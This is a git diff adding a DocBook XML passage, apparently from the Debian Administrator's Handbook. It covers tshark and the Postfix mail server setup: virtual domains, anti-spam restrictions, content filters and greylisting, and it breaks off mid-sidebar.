+				In our example, the packets traveling over SSH are filtered out (with the <literal>!tcp.port == 22</literal> filter). The packet currently displayed was developed at the HTTP layer.
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> <command>wireshark</command> with no graphical interface: <command>tshark</command></title>
+			 <indexterm>
+				<primary><command>tshark</command></primary>
+			</indexterm>
+			 <para>
+				When one cannot run a graphical interface, or does not wish to do so for whatever reason, a text-only version of <command>wireshark</command> also exists under the name <command>tshark</command> (in a separate <emphasis role="pkg">tshark</emphasis> package). Most of the capture and decoding features are still available, but the lack of a graphical interface necessarily limits the interactions with the program (filtering packets after they've been captured, tracking of a given TCP connection, and so on). It can still be used as a first approach. If further manipulations are intended and require the graphical interface, the packets can be saved to a file and this file can be loaded into a graphical <command>wireshark</command> running on another machine.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/11_network-services.xml b/tmp/cs-CZ/xml/11_network-services.xml
new file mode 100644
index 000000000..e70132111
--- /dev/null
+++ b/tmp/cs-CZ/xml/11_network-services.xml
@@ -0,0 +1,2808 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="network-services" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Postfix</keyword>
+			 <keyword>Apache</keyword>
+			 <keyword>NFS</keyword>
+			 <keyword>Samba</keyword>
+			 <keyword>Squid</keyword>
+			 <keyword>OpenLDAP</keyword>
+			 <keyword>SIP</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Network Services: Postfix, Apache, NFS, Samba, Squid, LDAP, SIP, XMPP, TURN</title>
+	 <highlights> <para>
+		Network services are the programs that users interact with directly in their daily work. They are the tip of the information system iceberg, and this chapter focuses on them; the hidden parts they rely on are the infrastructure we already described.
+	</para>
+	 <para>
+		Many modern network services require encryption technology to operate reliably and securely, especially when used on the public Internet. X.509 Certificates (which may also be referred to as SSL Certificates or TLS Certificates) are frequently used for this purpose. A certificate for a specific domain can often be shared between more than one of the services discussed in this chapter.
+	</para>
+	 <indexterm>
+		<primary>TLS</primary>
+	</indexterm>
+	 <indexterm>
+		<primary>X.509</primary>
+	</indexterm>
+	 <indexterm>
+		<primary>Certificates</primary>
+	</indexterm>
+	 </highlights> <section id="sect.smtp-mail-server">
+		<title>Mail Server</title>
+		 <para>
+			The Falcot Corp administrators selected Postfix for the electronic mail server, due to its reliability and its ease of configuration. Indeed, its design enforces that each task is implemented in a process with the minimum set of required permissions, which is a great mitigation measure against security problems.
+		</para>
+		 <indexterm>
+			<primary>email</primary>
+			<secondary>server</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>mail server</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Postfix</primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> The Exim4 server</title>
+		 <indexterm>
+			<primary>Exim</primary>
+		</indexterm>
+		 <para>
+			Debian uses Exim4 as the default email server (which is why the initial installation includes Exim4). The configuration is provided by a separate package, <emphasis role="pkg">exim4-config</emphasis>, and automatically customized based on the answers to a set of Debconf questions very similar to the questions asked by the <emphasis role="pkg">postfix</emphasis> package.
+		</para>
+		 <para>
+			The configuration can be either in one single file (<filename>/etc/exim4/exim4.conf.template</filename>) or split across a number of configuration snippets stored under <filename>/etc/exim4/conf.d/</filename>. In both cases, the files are used by <command>update-exim4.conf</command> as templates to generate <filename>/var/lib/exim4/config.autogenerated</filename>. The latter is the file used by Exim4. Thanks to this mechanism, values obtained through Exim's debconf configuration — which are stored in <filename>/etc/exim4/update-exim4.conf.conf</filename> — can be injected in Exim's configuration file, even when the administrator or another package has altered the default Exim configuration.
+		</para>
+		 <para>
+			The Exim4 configuration file syntax has its peculiarities and its learning curve; however, once these peculiarities are understood, Exim4 is a very complete and powerful email server, as evidenced by the tens of pages of documentation. <ulink type="block" url="http://www.exim.org/docs.html" />
+		</para>
+		 </sidebar> <section>
+			<title>Installing Postfix</title>
+			 <para>
+				The <emphasis role="pkg">postfix</emphasis> package includes the main SMTP daemon. Other packages (such as <emphasis role="pkg">postfix-ldap</emphasis> and <emphasis role="pkg">postfix-pgsql</emphasis>) add extra functionality to Postfix, including access to mapping databases. You should only install them if you know that you need them.
+			</para>
+			 <sidebar id="sidebar.smtp"> <title><emphasis>BACK TO BASICS</emphasis> SMTP</title>
+			 <indexterm>
+				<primary>SMTP</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Simple Mail Transfer Protocol</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>server</primary>
+				<secondary>SMTP</secondary>
+			</indexterm>
+			 <para>
+				SMTP (<emphasis>Simple Mail Transfer Protocol</emphasis>) is the protocol used by mail servers to exchange and route emails.
+			</para>
+			 </sidebar> <para>
+				Several Debconf questions are asked during the installation of the package. The answers allow generating a first version of the <filename>/etc/postfix/main.cf</filename> configuration file.
+			</para>
+			 <para>
+				The first question deals with the type of setup. Only two of the proposed answers are relevant in case of an Internet-connected server, “Internet site” and “Internet with smarthost”. The former is appropriate for a server that receives incoming email and sends outgoing email directly to its recipients, and is therefore well-adapted to the Falcot Corp case. The latter is appropriate for a server receiving incoming email normally, but that sends outgoing email through an intermediate SMTP server — the “smarthost” — rather than directly to the recipient's server. This is mostly useful for individuals with a dynamic IP address, since many email servers reject messages coming straight from such an IP address. In this case, the smarthost will usually be the ISP's SMTP server, which is always configured to accept email coming from the ISP's customers and forward it appropriately. This setup (with a smarthost) is also relevant for servers that are not permanently connected to the internet, since it avoids having to manage a queue of undeliverable messages that need to be retried later.
+			</para>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> ISP</title>
+			 <indexterm>
+				<primary>ISP, Internet Service Provider</primary>
+			</indexterm>
+			 <para>
+				ISP is the acronym for “Internet Service Provider”. It covers an entity, often a commercial company, that provides Internet connections and the associated basic services (email, news and so on).
+			</para>
+			 <para>
+			</para>
+			 </sidebar> <para>
+				The second question deals with the full name of the machine, used to generate email addresses from a local user name; the full name of the machine ends up as the part after the at-sign (“@”). In the case of Falcot, the answer should be <literal>mail.falcot.com</literal>. This is the only question asked by default, but the configuration it leads to is not complete enough for the needs of Falcot, which is why the administrators run <command>dpkg-reconfigure postfix</command> so as to be able to customize more parameters.
+			</para>
+			 <para>
+				One of the extra questions asks for all the domain names related to this machine. The default list includes its full name as well as a few synonyms for <literal>localhost</literal>, but the main <literal>falcot.com</literal> domain needs to be added by hand. More generally, this question should usually be answered with all the domain names for which this machine should serve as an MX server; in other words, all the domain names for which the DNS says that this machine will accept email. This information ends up in the <literal>mydestination</literal> variable of the main Postfix configuration file — <filename>/etc/postfix/main.cf</filename>.
+			</para>
+			 <indexterm>
+				<primary>server</primary>
+				<secondary>MX</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>MX</primary>
+				<secondary>server</secondary>
+			</indexterm>
+			 <figure>
+				<title>Role of the DNS <emphasis>MX</emphasis> record while sending a mail</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/mail-server.png" format="PNG" scalefit="1" width="60%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <sidebar> <title><emphasis>EXTRA</emphasis> Querying the MX records</title>
+			 <para>
+				When the DNS does not have an MX record for a domain, the email server will try sending the messages to the host itself, by using the matching A record (or AAAA in IPv6).
+			</para>
+			 </sidebar> <para>
+				In some cases, the installation can also ask what networks should be allowed to send email via the machine. In its default configuration, Postfix only accepts emails coming from the machine itself; the local network will usually be added. The Falcot Corp administrators added <literal>192.168.0.0/16</literal> to the default answer. If the question is not asked, the relevant variable in the configuration file is <literal>mynetworks</literal>, as seen in the example below.
+			</para>
+			 <para>
+				Local email can also be delivered through <command>procmail</command>. This tool allows users to sort their incoming email according to rules stored in their <filename>~/.procmailrc</filename> file.
+			</para>
+			 <indexterm>
+				<primary><command>procmail</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>email</primary>
+				<secondary>filtering</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>filtering email</primary>
+			</indexterm>
+			 <para>
+				After this first step, the administrators got the following configuration file; it will be used as a starting point for adding some extra functionality in the next sections.
+			</para>
+			 <example>
+				<title>Initial <filename>/etc/postfix/main.cf</filename> file</title>
+				 
+<programlisting>
+# See /usr/share/postfix/main.cf.dist for a commented, more complete version
+
+
+# Debian specific:  Specifying a file name will cause the first
+# line of that file to be used as the name.  The Debian default
+# is /etc/mailname.
+#myorigin = /etc/mailname
+
+smtpd_banner = $myhostname ESMTP $mail_name (Debian/GNU)
+biff = no
+
+# appending .domain is the MUA's job.
+append_dot_mydomain = no
+
+# Uncomment the next line to generate "delayed mail" warnings
+#delay_warning_time = 4h
+
+readme_directory = no
+
+# TLS parameters
+smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
+smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
+smtpd_use_tls=yes
+smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
+smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
+
+# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
+# information on enabling SSL in the smtp client.
+
+smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination
+myhostname = mail.falcot.com
+alias_maps = hash:/etc/aliases
+alias_database = hash:/etc/aliases
+myorigin = /etc/mailname
+mydestination = mail.falcot.com, falcot.com, localhost.localdomain, localhost
+relayhost = 
+mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128 192.168.0.0/16
+mailbox_command = procmail -a "$EXTENSION"
+mailbox_size_limit = 0
+recipient_delimiter = +
+inet_interfaces = all
+inet_protocols = all
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>SECURITY</emphasis> <emphasis>Snake oil</emphasis> SSL certificates</title>
+			 <para>
+				The <emphasis>snake oil</emphasis> certificates, like the <emphasis>snake oil</emphasis> “medicine” sold by unscrupulous quacks in old times, have absolutely no value: you cannot rely on them to authenticate the server since they are automatically generated self-signed certificates. However they are useful to improve the privacy of the exchanges.
+			</para>
+			 <para>
+				In general they should only be used for testing purposes, and normal service must use real certificates; these can be generated with the procedure described in <xref linkend="sect.easy-rsa" />.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.configuring-virtual-domains">
+			<title>Configuring Virtual Domains</title>
+			 <indexterm>
+				<primary>domain</primary>
+				<secondary>virtual</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>virtual domain</primary>
+			</indexterm>
+			 <para>
+				The mail server can receive emails addressed to other domains besides the main domain; these are then known as virtual domains. In most cases where this happens, the emails are not ultimately destined to local users. Postfix provides two interesting features for handling virtual domains.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Virtual domains and canonical domains</title>
+			 <para>
+				None of the virtual domains must be referenced in the <literal>mydestination</literal> variable; this variable only contains the names of the “canonical” domains directly associated to the machine and its local users.
+			</para>
+			 </sidebar> <section>
+				<title>Virtual Alias Domains</title>
+				 <indexterm>
+					<primary>alias</primary>
+					<secondary>virtual alias domain</secondary>
+				</indexterm>
+				 <indexterm>
+					<primary>virtual domain</primary>
+					<secondary>virtual alias domain</secondary>
+				</indexterm>
+				 <para>
+					A virtual alias domain only contains aliases, i.e. addresses that only forward emails to other addresses.
+				</para>
+				 <para>
+					Such a domain is enabled by adding its name to the <literal>virtual_alias_domains</literal> variable, and referencing an address mapping file in the <literal>virtual_alias_maps</literal> variable.
+				</para>
+				 <example>
+					<title>Directives to add in the <filename>/etc/postfix/main.cf</filename> file</title>
+					 
+<programlisting>
+virtual_alias_domains = falcotsbrand.com
+virtual_alias_maps = hash:/etc/postfix/virtual
+</programlisting>
+
+				</example>
+				 <para>
+					The <filename>/etc/postfix/virtual</filename> file describes a mapping with a rather straightforward syntax: each line contains two fields separated by whitespace; the first field is the alias name, the second field is a list of email addresses where it redirects. The special <literal>@domain.com</literal> syntax covers all remaining aliases in a domain.
+				</para>
+				 <example>
+					<title>Example <filename>/etc/postfix/virtual</filename> file</title>
+					 
+<programlisting>
+webmaster@falcotsbrand.com  jean@falcot.com
+contact@falcotsbrand.com    laure@falcot.com, sophie@falcot.com
+# The alias below is generic and covers all addresses within 
+# the falcotsbrand.com domain not otherwise covered by this file.
+# These addresses forward email to the same user name in the
+# falcot.com domain.
+@falcotsbrand.com           @falcot.com
+</programlisting>
+
+				</example>
+
+			</section>
+			 <section>
+				<title>Virtual Mailbox Domains</title>
+				 <sidebar> <title><emphasis>CAUTION</emphasis> Combined virtual domain?</title>
+				 <para>
+					Postfix does not allow using the same domain in both <literal>virtual_alias_domains</literal> and <literal>virtual_mailbox_domains</literal>. However, every domain of <literal>virtual_mailbox_domains</literal> is implicitly included in <literal>virtual_alias_domains</literal>, which makes it possible to mix aliases and mailboxes within a virtual domain.
+				</para>
+				 </sidebar> <indexterm>
+					<primary>mailbox, virtual domain</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>virtual domain</primary>
+					<secondary>virtual mailbox domain</secondary>
+				</indexterm>
+				 <para>
+					Messages addressed to a virtual mailbox domain are stored in mailboxes not assigned to a local system user.
+				</para>
+				 <para>
+					Enabling a virtual mailbox domain requires naming this domain in the <literal>virtual_mailbox_domains</literal> variable, and referencing a mailbox mapping file in <literal>virtual_mailbox_maps</literal>. The <literal>virtual_mailbox_base</literal> parameter contains the directory under which the mailboxes will be stored.
+				</para>
+				 <para>
+					The <literal>virtual_uid_maps</literal> parameter (respectively <literal>virtual_gid_maps</literal>) references the file containing the mapping between the email address and the system user (respectively group) that “owns” the corresponding mailbox. To get all mailboxes owned by the same owner/group, the <literal>static:5000</literal> syntax assigns a fixed UID/GID (of value 5000 here).
+				</para>
+				 <example>
+					<title>Directives to add in the <filename>/etc/postfix/main.cf</filename> file</title>
+					 
+<programlisting>
+virtual_mailbox_domains = falcot.org
+virtual_mailbox_maps = hash:/etc/postfix/vmailbox
+virtual_mailbox_base = /var/mail/vhosts
+</programlisting>
+
+				</example>
+				 <para>
+					Again, the syntax of the <filename>/etc/postfix/vmailbox</filename> file is quite straightforward: two fields separated with whitespace. The first field is an email address within one of the virtual domains, and the second field is the location of the associated mailbox (relative to the directory specified in <emphasis>virtual_mailbox_base</emphasis>). If the mailbox name ends with a slash (<literal>/</literal>), the emails will be stored in the <emphasis>maildir</emphasis> format; otherwise, the traditional <emphasis>mbox</emphasis> format will be used. The <emphasis>maildir</emphasis> format uses a whole directory to store a mailbox, each individual message being stored in a separate file. In the <emphasis>mbox</emphasis> format, on the other hand, the whole mailbox is stored in one file, and each line starting with “<literal>From </literal>” (<literal>From</literal> followed by a space) signals the start of a new message.
+				</para>
+				 <example>
+					<title>The <filename>/etc/postfix/vmailbox</filename> file</title>
+					 
+<programlisting>
+# Jean's email is stored as maildir, with
+# one file per email in a dedicated directory
+jean@falcot.org falcot.org/jean/
+# Sophie's email is stored in a traditional "mbox" file,
+# with all mails concatenated into one single file
+sophie@falcot.org falcot.org/sophie
+</programlisting>
+
+				</example>
+
+			</section>
+
+		</section>
+		 <section id="sect.restrictions-for-receiving-and-sending">
+			<title>Restrictions for Receiving and Sending</title>
+			 <para>
+				The growing number of unsolicited bulk emails (<emphasis>spam</emphasis>) requires being increasingly strict when deciding which emails a server should accept. This section presents some of the strategies included in Postfix.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> The spam problem</title>
+			 <indexterm>
+				<primary>spam</primary>
+			</indexterm>
+			 <para>
+				“Spam” is a generic term used to designate all the unsolicited commercial emails (also known as UCEs) that flood our electronic mailboxes; the unscrupulous individuals sending them are known as spammers. They care little about the nuisance they cause, since sending an email costs very little, and only a very small percentage of recipients need to be attracted by the offers for the spamming operation to make more money than it costs. The process is mostly automated, and any email address made public (for instance, on a web forum, or on the archives of a mailing list, or on a blog, and so on) will be discovered by the spammers' robots, and subjected to a never-ending stream of unsolicited messages.
+			</para>
+			 <para>
+				All system administrators try to face this nuisance with spam filters, but of course spammers keep adjusting to try to work around these filters. Some even rent networks of machines compromised by a worm from various crime syndicates. Recent statistics estimate that up to 95% of all emails circulating on the Internet are spam!
+			</para>
+			 </sidebar> <section>
+				<title>IP-Based Access Restrictions</title>
+				 <para>
+					The <literal>smtpd_client_restrictions</literal> directive controls which machines are allowed to communicate with the email server.
+				</para>
+				 <example>
+					<title>Restrictions Based on Client Address</title>
+					 
+<programlisting>
+smtpd_client_restrictions = permit_mynetworks,
+    warn_if_reject reject_unknown_client,
+    check_client_access hash:/etc/postfix/access_clientip,
+    reject_rbl_client sbl-xbl.spamhaus.org,
+    reject_rbl_client list.dsbl.org
+</programlisting>
+
+				</example>
+				 <para>
+					When a variable contains a list of rules, as in the example above, these rules are evaluated in order, from the first to the last. Each rule can accept the message, reject it, or leave the decision to a following rule. As a consequence, order matters, and simply switching two rules can lead to a widely different behavior.
+				</para>
+				 <para>
+					The <literal>permit_mynetworks</literal> directive, used as the first rule, accepts all emails coming from a machine in the local network (as defined by the <emphasis>mynetworks</emphasis> configuration variable).
+				</para>
+				 <para>
+					The second directive would normally reject emails coming from machines without a completely valid DNS configuration. Such a valid configuration means that the IP address can be resolved to a name, and that this name, in turn, resolves to the IP address. This restriction is often too strict, since many email servers do not have a reverse DNS for their IP address. This explains why the Falcot administrators prepended the <literal>warn_if_reject</literal> modifier to the <literal>reject_unknown_client</literal> directive: this modifier turns the rejection into a simple warning recorded in the logs. The administrators can then keep an eye on the number of messages that would be rejected if the rule were actually enforced, and make an informed decision later if they wish to enable such enforcement.
+				</para>
+				 <sidebar> <title><emphasis>TIP</emphasis> <emphasis>access</emphasis> tables</title>
+				 <para>
+					The restriction criteria include administrator-modifiable tables listing combinations of senders, IP addresses, and allowed or forbidden hostnames. These tables can be created from an uncompressed copy of the <filename>/usr/share/doc/postfix-doc/examples/access.gz</filename> file. This model is self-documented in its comments, which means each table describes its own syntax.
+				</para>
+				 <para>
+					The <filename>/etc/postfix/access_clientip</filename> table lists IP addresses and networks; <filename>/etc/postfix/access_helo</filename> lists domain names; <filename>/etc/postfix/access_sender</filename> contains sender email addresses. All these files need to be turned into hash-tables (a format optimized for fast access) after each change, with the <command>postmap /etc/postfix/<replaceable>file</replaceable></command> command.
+				</para>
+				 </sidebar> <para>
+					The third directive allows the administrator to set up a blacklist and a whitelist of email servers, stored in the <filename>/etc/postfix/access_clientip</filename> file. Servers in the whitelist are considered as trusted, and the emails coming from there therefore do not go through the following filtering rules.
+				</para>
+				 <para>
+					The last two rules reject any message coming from a server listed in one of the indicated blacklists. RBL is an acronym for <emphasis>Remote Black List</emphasis>; there are several such lists, but they all list badly configured servers that spammers use to relay their emails, as well as unexpected mail relays such as machines infected with worms or viruses.
+				</para>
+				 <indexterm>
+					<primary>RBL</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Remote Black List</primary>
+				</indexterm>
+				 <sidebar> <title><emphasis>TIP</emphasis> White list and RBLs</title>
+				 <para>
+					Blacklists sometimes include a legitimate server that has been suffering an incident. In these situations, all emails coming from one of these servers would be rejected unless the server is listed in a whitelist defined by <filename>/etc/postfix/access_clientip</filename>.
+				</para>
+				 <para>
+					Prudence therefore recommends including in the whitelist all the trusted servers from which many emails are usually received.
+				</para>
+				 </sidebar>
+			</section>
+			 <section>
+				<title>Checking the Validity of the <literal>EHLO</literal> or <literal>HELO</literal> Commands</title>
+				 <para>
+					Each SMTP exchange starts with a <literal>HELO</literal> (or <literal>EHLO</literal>) command, followed by the name of the sending email server; checking the validity of this name can be interesting.
+				</para>
+				 <indexterm>
+					<primary><literal>HELO</literal></primary>
+				</indexterm>
+				 <indexterm>
+					<primary><literal>EHLO</literal></primary>
+				</indexterm>
+				 <example>
+					<title>Restrictions on the name announced in <literal>EHLO</literal></title>
+					 
+<programlisting>
+smtpd_helo_restrictions = permit_mynetworks,
+    reject_invalid_hostname,
+    check_helo_access hash:/etc/postfix/access_helo,
+    reject_non_fqdn_hostname,
+    warn_if_reject reject_unknown_hostname
+</programlisting>
+
+				</example>
+				 <para>
+					The first <literal>permit_mynetworks</literal> directive allows all machines on the local network to introduce themselves freely. This is important, because some email programs do not respect this part of the SMTP protocol adequately enough, and they can introduce themselves with nonsensical names.
+				</para>
+				 <para>
+					The <literal>reject_invalid_hostname</literal> rule rejects emails when the <literal>EHLO</literal> announce lists a syntactically incorrect hostname. The <literal>reject_non_fqdn_hostname</literal> rule rejects messages when the announced hostname is not a fully-qualified domain name (including a domain name as well as a host name). The <literal>reject_unknown_hostname</literal> rule rejects messages if the announced name does not exist in the DNS. Since this last rule unfortunately leads to too many rejections, the administrators turned its effect to a simple warning with the <literal>warn_if_reject</literal> modifier as a first step; they may decide to remove this modifier at a later stage, after auditing the results of this rule.
+				</para>
+				 <para>
+					Using <literal>permit_mynetworks</literal> as the first rule has an interesting side effect: the following rules only apply to hosts outside the local network. This allows blacklisting all hosts that announce themselves as part of the <literal>falcot.com</literal>, for instance by adding a <literal>falcot.com REJECT You are not in our network!</literal> line to the <filename>/etc/postfix/access_helo</filename> file.
+				</para>
+
+			</section>
+			 <section>
+				<title>Accepting or Refusing Based on the Announced Sender</title>
+				 <para>
+					Every message has a sender, announced by the <literal>MAIL FROM</literal> command of the SMTP protocol; again, this information can be validated in several different ways.
+				</para>
+				 <indexterm>
+					<primary><literal>MAIL FROM</literal></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>email</primary>
+					<secondary>filtering on the sender</secondary>
+				</indexterm>
+				 <example>
+					<title>Sender checks</title>
+					 
+<programlisting>
+smtpd_sender_restrictions = 
+    check_sender_access hash:/etc/postfix/access_sender,
+    reject_unknown_sender_domain, reject_unlisted_sender,
+    reject_non_fqdn_sender
+</programlisting>
+
+				</example>
+				 <para>
+					The <filename>/etc/postfix/access_sender</filename> table maps some special treatment to some senders. This usually means listing some senders into a white list or a black list.
+				</para>
+				 <para>
+					The <literal>reject_unknown_sender_domain</literal> rule requires a valid sender domain, since it is needed for a valid address. The <literal>reject_unlisted_sender</literal> rule rejects local senders if the address does not exist; this prevents emails from being sent from an invalid address in the <literal>falcot.com</literal> domain, and messages emanating from <literal>joe.bloggs@falcot.com</literal> are only accepted if such an address really exists.
+				</para>
+				 <para>
+					Finally, the <literal>reject_non_fqdn_sender</literal> rule rejects emails purporting to come from addresses without a fully-qualified domain name. In practice, this means rejecting emails coming from <literal>user@machine</literal>: the address must be announced as either <literal>user@machine.example.com</literal> or <literal>user@example.com</literal>.
+				</para>
+
+			</section>
+			 <section>
+				<title>Accepting or Refusing Based on the Recipient</title>
+				 <para>
+					Each email has at least one recipient, announced with the <literal>RCPT TO</literal> command in the SMTP protocol. These addresses also warrant validation, even if that may be less relevant than the checks made on the sender address.
+				</para>
+				 <indexterm>
+					<primary>RCPT TO</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>email</primary>
+					<secondary>filtering on the recipient</secondary>
+				</indexterm>
+				 <example>
+					<title>Recipient checks</title>
+					 
+<programlisting>
+smtpd_recipient_restrictions = permit_mynetworks, 
+    reject_unauth_destination, reject_unlisted_recipient, 
+    reject_non_fqdn_recipient
+</programlisting>
+
+				</example>
+				 <para>
+					<literal>reject_unauth_destination</literal> is the basic rule that requires outside messages to be addressed to us; messages sent to an address not served by this server are rejected. Without this rule, a server becomes an open relay that allows spammers to send unsolicited emails; this rule is therefore mandatory, and it will be best included near the beginning of the list, so that no other rules may authorize the message before its destination has been checked.
+				</para>
+				 <para>
+					The <literal>reject_unlisted_recipient</literal> rule rejects messages sent to non-existing local users, which makes sense. Finally, the <literal>reject_non_fqdn_recipient</literal> rule rejects non-fully-qualified addresses; this makes it impossible to send an email to <literal>jean</literal> or <literal>jean@machine</literal>, and requires using the full address instead, such as <literal>jean@machine.falcot.com</literal> or <literal>jean@falcot.com</literal>.
+				</para>
+
+			</section>
+			 <section>
+				<title>Restrictions Associated with the <literal>DATA</literal> Command</title>
+				 <para>
+					The <literal>DATA</literal> command of SMTP is emitted before the contents of the message. It doesn't provide any information per se, apart from announcing what comes next. It can still be subjected to checks.
+				</para>
+				 <indexterm>
+					<primary><literal>DATA</literal></primary>
+				</indexterm>
+				 <example>
+					<title><literal>DATA</literal> checks</title>
+					 
+<programlisting>
+smtpd_data_restrictions = reject_unauth_pipelining
+</programlisting>
+
+				</example>
+				 <para>
+					The <literal>reject_unauth_pipelining</literal> directives causes the message to be rejected if the sending party sends a command before the reply to the previous command has been sent. This guards against a common optimization used by spammer robots, since they usually don't care a fig about replies and only focus on sending as many emails as possible in as short a time as possible.
+				</para>
+
+			</section>
+			 <section>
+				<title>Applying Restrictions</title>
+				 <para>
+					Although the above commands validate information at various stages of the SMTP exchange, Postfix only sends the actual rejection as a reply to the <literal>RCPT TO</literal> command.
+				</para>
+				 <para>
+					This means that even if the message is rejected due to an invalid <literal>EHLO</literal> command, Postfix knows the sender and the recipient when announcing the rejection. It can then log a more explicit message than it could if the transaction had been interrupted from the start. In addition, a number of SMTP clients do not expect failures on the early SMTP commands, and these clients will be less disturbed by this late rejection.
+				</para>
+				 <para>
+					A final advantage to this choice is that the rules can accumulate information during the various stages of the SMTP exchange; this allows defining more fine-grained permissions, such as rejecting a non-local connection if it announces itself with a local sender.
+				</para>
+
+			</section>
+			 <section>
+				<title>Filtering Based on the Message Contents</title>
+				 <para>
+					The validation and restriction system would not be complete without a way to apply checks to the message contents. Postfix differentiates the checks applying to the email headers from those applying to the email body.
+				</para>
+				 <example>
+					<title>Enabling content-based filters</title>
+					 
+<programlisting>
+header_checks = regexp:/etc/postfix/header_checks
+body_checks = regexp:/etc/postfix/body_checks
+</programlisting>
+
+				</example>
+				 <indexterm>
+					<primary>email</primary>
+					<secondary>filtering on contents</secondary>
+				</indexterm>
+				 <para>
+					Both files contain a list of regular expressions (commonly known as <emphasis>regexps</emphasis> or <emphasis>regexes</emphasis>) and associated actions to be triggered when the email headers (or body) match the expression.
+				</para>
+				 <sidebar> <title><emphasis>QUICK LOOK</emphasis> Regexp tables</title>
+				 <para>
+					The <filename>/usr/share/doc/postfix-doc/examples/header_checks.gz</filename> file contains many explanatory comments and can be used as a starting point for creating the <filename>/etc/postfix/header_checks</filename> and <filename>/etc/postfix/body_checks</filename> files.
+				</para>
+				 </sidebar> <example>
+					<title>Example <filename>/etc/postfix/header_checks</filename> file</title>
+					 
+<programlisting>
+/^X-Mailer: GOTO Sarbacane/ REJECT I fight spam (GOTO Sarbacane)
+/^Subject: *Your email contains VIRUSES/ DISCARD virus notification
+</programlisting>
+
+				</example>
+				 <sidebar id="sidebar.regexp"> <title><emphasis>BACK TO BASICS</emphasis> Regular expression</title>
+				 <para>
+					The <emphasis>regular expression</emphasis> term (shortened to <emphasis>regexp</emphasis> or <emphasis>regex</emphasis>) references a generic notation for expressing a description of the contents and/or structure of a string of characters. Certain special characters allow defining alternatives (for instance, <literal>foo|bar</literal> matches either “foo” or “bar”), sets of allowed characters (for instance, <literal>[0-9]</literal> means any digit, and <literal>.</literal> — a dot — means any character), quantifications (<literal>s?</literal> matches either <literal>s</literal> or the empty string, in other words 0 or 1 occurrence of <literal>s</literal>; <literal>s+</literal> matches one or more consecutive <literal>s</literal> characters; and so on). Parentheses allow grouping search results.
+				</para>
+				 <para>
+					The precise syntax of these expressions varies across the tools using them, but the basic features are similar. <ulink type="block" url="http://en.wikipedia.org/wiki/Regular_expression" />
+				</para>
+				 </sidebar> <para>
+					The first one checks the header mentioning the email software; if <literal>GOTO Sarbacane</literal> (a bulk email software) is found, the message is rejected. The second expression controls the message subject; if it mentions a virus notification, we can decide not to reject the message but to discard it immediately instead.
+				</para>
+				 <para>
+					Using these filters is a double-edged sword, because it is easy to make the rules too generic and to lose legitimate emails as a consequence. In these cases, not only the messages will be lost, but their senders will get unwanted (and annoying) error messages.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.setting-up-greylisting">
+			<title>Setting Up <foreignphrase>greylisting</foreignphrase></title>
+			 <indexterm>
+				<primary>greylisting</primary>
+			</indexterm>
+			 <para>
+				“Greylisting” is a filtering technique according to which a message is initially rejected with a temporary error code, and only accepted on a further try after some delay. This filtering is particularly efficient against spam sent by the many machines infected by worms and viruses, since this software rarely acts as a full SMTP agent (by checking the error code and retrying failed messages later), especially since many of the harvested addresses are really invalid and retrying would only mean losing time.
+			</para>
+			 <para>
+				Postfix doesn't provide greylisting natively, but there is a feature by which the decision to accept or reject a given message can be delegated to an external program. The <emphasis role="pkg">postgrey</emphasis> package contains just such a program, designed to interface with this access policy delegation service.
+			</para>
+			 <para>
+				Once <emphasis role="pkg">postgrey</emphasis> is installed, it runs as a daemon and listens on port 10023. Postfix can then be configured to use it, by adding the <literal>check_policy_service</literal> parameter as an extra restriction:
+			</para>
+			 
+<programlisting>
+smtpd_recipient_restrictions = permit_mynetworks,
+    [...]
+    check_policy_service inet:127.0.0.1:10023
+</programlisting>
+			 <para>
+				Each time Postfix reaches this rule in the ruleset, it will connect to the <command>postgrey</command> daemon and send it information concerning the relevant message. On its side, Postgrey considers the IP address/sender/recipient triplet and checks in its database whether that same triplet has been seen recently. If so, Postgrey replies that the message should be accepted; if not, the reply indicates that the message should be temporarily rejected, and the triplet gets recorded in the database.
+			</para>
+			 <para>
+				The main disadvantage of greylisting is that legitimate messages get delayed, which is not always acceptable. It also increases the burden on servers that send many legitimate emails.
+			</para>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Shortcomings of greylisting</title>
+			 <para>
